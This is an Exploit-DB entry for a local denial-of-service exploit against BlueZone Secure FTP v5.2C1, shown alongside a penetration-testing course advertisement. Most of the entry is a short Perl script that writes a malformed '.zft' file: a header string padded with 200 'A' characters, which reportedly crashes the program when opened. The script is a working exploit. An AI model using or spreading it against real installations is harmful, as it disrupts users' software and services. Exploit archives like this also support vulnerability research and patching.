BlueZone - '.zft' File Local Denial of Service

EDB-ID:

18029

CVE:





Platform:

Windows

Date:

2011-10-24


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

#!/usr/bin/perl -w
# Exploit Title: BlueZone Desktop Malformed .zft ffeil Local Denial of Service
# Date: 24-10-11
# Author: Iolo Morganwg
# Version: BlueZone Secure FTP v5.2C1 Build 1469
# Download: http://www.rocketsoftware.com/bluezone/products/secure-ftp/downloads/secure-ftp
# Tested on: Windows XP SP3

#To trigger: Run script {chwilfriwio.pl}, open with BlueZoneFTP, program dies - horribly!.
 
my $ffeil = "chwilfriwio.zft";
my $head = "BFTP100EKColorsVCustom@";
my $junk = "A" x 200;
 
open($ffeil, ">$ffeil");
print $ffeil $head.$junk;
close($ffeil);